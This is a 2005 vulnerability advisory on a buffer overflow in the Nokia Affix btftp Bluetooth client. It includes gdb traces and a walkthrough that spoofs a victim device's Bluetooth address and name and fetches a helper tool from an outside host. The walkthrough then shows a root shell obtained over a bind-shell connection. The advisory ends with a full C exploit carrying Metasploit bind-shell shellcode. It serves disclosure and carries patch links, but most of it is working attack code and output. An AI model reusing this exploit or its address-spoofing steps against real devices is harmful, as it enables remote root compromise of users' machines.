DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow'
DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References:
http://www.digitalmunition.com/DMA[2005-0712a].txt
Description:
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia
Research Center in
Helsinki and released under GPL. Affix supports the core Bluetooth protocols
like HCI, L2CAP 1.1,
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of
'affix-kernel' which
provides kernel modules and 'affix' which provides control tools, libraries,
and server daemons.
Although Nokia believes that Affix is an useful piece of software, please bear
in mind that it is
not an official Nokia product, but a result of the research activity of Nokia
Research Center.
The Affix Bluetooth client utility 'btftp' contains a buffer overflow in the
proccessing of long
filenames. By placing a 102 character filename into a public bluetooth share
you are able to
overwrite the eip (on an x86 version) of the btftp client.
In this example the machine 'frieza' (00:11:95:4f:60:1f) is running btsrv with
OBEX File Transfer.
Place a test file in the public bluetooth share.
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "41" x 98' . "DCBA"`
Connect from a vulnerable client machine in order to demonstrate the overflow.
Starting program: /usr/bin/btctl ftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
----- 0 AAAAAAAAAAAAA...AAAAAAAAAAAAAADCBA
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) i r
eax 0x10 16
ecx 0x0 0
edx 0x4001a1e3 1073848803
ebx 0x41414141 1094795585
esp 0xbffffbc0 0xbffffbc0
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41424344 0x41424344
(gdb) x/4s $esp-100
0xbffffb5c: " Info"
0xbffffb62: "er"
0xbffffb65: 'A' <repeats 87 times>, "DCBA"
0xbffffbc1: " \001@À\217\005\b"
As a quick test we will use anathema@xxxxxxxxxx's 0xff-less execve() /bin/sh
shellcode and a bit of
perl to see if we can execute code.
root@frieza:~# cd /var/spool/affix/Inbox/
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "\x90" x
(94-45)'``../ffless``perl -e 'print "\x5b\xfb\xff\xbf" x10 '`
root@frieza:/var/spool/affix/Inbox# ls
?????????????????????????????????????????????????????0?.bin@???.sh!@?F?)??F??v??F??????K??S???[???[???[???[???[???[???[???[???[???[???
As you can see we are able to run our payload on the client machine, however in
this case the
shellcode needs to be swapped out for something more useful.
threat:~# btftp
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
-rwdx 1512 ffless.c
-rwdx 12605 ffless
-rwdx 0 °
Í
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000c20 in ?? () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05b#
Keep in mind that in order to exploit this the attacker MUST be able to
convince the target to browse
an obex file share that is under control of the attacker. Using an Ericsson ROK
101 008 bluetooth
chip will increase our chances of success. Below shows an example impersonation
scenario.
First lets find someone to impersonate.
root@frieza:~# btctl discovery
Searching 8 sec ...
Searching done. Resolving names ...
done.
+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat"
Computer (Desktop) [Networking,Object Transfer,Audio,Information]
+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth
Modem"
Phone (Wired Modem/VoiceGW) [Networking,Telephony]
+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC"
Computer (Handheld PC/PDA) [Networking,Object Transfer]
Lets pretend to be some poor chaps PDA! We need to steal his BD_ADDR first.
root@frieza:~# btctl
bt0 01:02:03:04:05:06
Flags: UP DISC CONN
RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0
TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# wget http://www.digitalmunition.com/setbd-affix.c
--11:50:18-- http://www.digitalmunition.com/setbd-affix.c
=> `setbd-affix.c'
Resolving www.digitalmunition.com... 195.74.102.163
Connecting to www.digitalmunition.com[195.74.102.163]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,951 [text/plain]
100%[================================================================================>]
2,951 --.--K/s
11:50:19 (29.36 KB/s) - `setbd-affix.c' saved [2951/2951]
root@frieza:~# cc -o setbd-affix setbd-affix.c -laffix
root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8
Using BD_ADDR from command line
Setting BDA to 00:04:3e:65:a1:c8
root@frieza:~# btctl reset
root@frieza:~# btctl down
root@frieza:~# btctl up
btctl: cmd_initdev: Unable to start device (bt0)
root@frieza:~# btctl up
root@frieza:~# btctl
bt0 00:04:3e:65:a1:c8
Flags: UP DISC CONN
RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0
TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# btctl name "Pocket_PC"
God I love my ROK chip!
Start up btsrv and wait for a connection from your target.
btsrv: main: btsrv started [Affix 2.1.2].
btsrv: start_service: Bound service Serial Port to port 1
btsrv: start_service: Bound service Dialup Networking to port 2
btsrv: start_service: Bound service Dialup Networking Emulation to port 3
btsrv: start_service: Bound service Fax Service to port 4
btsrv: start_service: Bound service LAN Access to port 5
btsrv: start_service: Bound service OBEX File Transfer to port 6
btsrv: start_service: Bound service OBEX Object Push to port 7
btsrv: start_service: Bound service Headset to port 8
btsrv: start_service: Bound service HeadsetAG to port 9
btsrv: start_service: Bound service HandsFree to port 10
btsrv: start_service: Bound service HandsFreeAG to port 11
You can tell that the target has connected by looking for the following in your
btsrv logs.
btsrv: handle_input: Connection from 00:0c:76:46:f0:21
channel 6 (OBEX File Transfer Profile)
btsrv: execute_cmd: Socket multiplexed to stdin/stdout
btsrv: signal_handler: Sig handler : 2
Upon connecting and performing a file list the target would see the following.
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
At this point your payload is running.
After they have been exploited you could use a hijacked PAND connection to
obtain your shell prompt.
Or perhaps write some bluetooth aware shellcode.
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/affix_320_sec.patch
http://affix.sourceforge.net/affix_212_sec.patch
This is basic timeline associated with this bug.
07/12/05 Public disclosure
07/11/05 notice that Security update.Patch for affix-3.2.0 was posted 07/01/05
07/06/05 Ask Carlos for update...
07/05/05 str0ke dropped code on milw0rm - http://www.milw0rm.com/id.php?id=1081
06/17/05 Carlos.Chinea stated "you are using a old version of affix...Please
update"
06/14/05 Carlos.Chinea contacted
-KF
/*
Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
----------------------
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
#include <stdio.h>
#include <strings.h>
main()
{
FILE *malfile;
/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex
http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99"
"\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34"
"\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d"
"\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd"
"\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07"
"\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36"
"\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde";
char buf[1024];
memset(buf,'\0',sizeof(buf));
memset(buf,'\x90',94);
strcat(buf+94,"\x75\xfb\xff\xbf");
strcat(buf+98,"\x75\xfb\xff\xbf");
memset(buf+102,'\x90',40);
strcat(buf+142,scode);
if(!(malfile = fopen(buf,"w+"))) {
printf("error opening file\n");
exit(1);
}
fprintf(malfile, "pwned\n" );
fclose(malfile);
}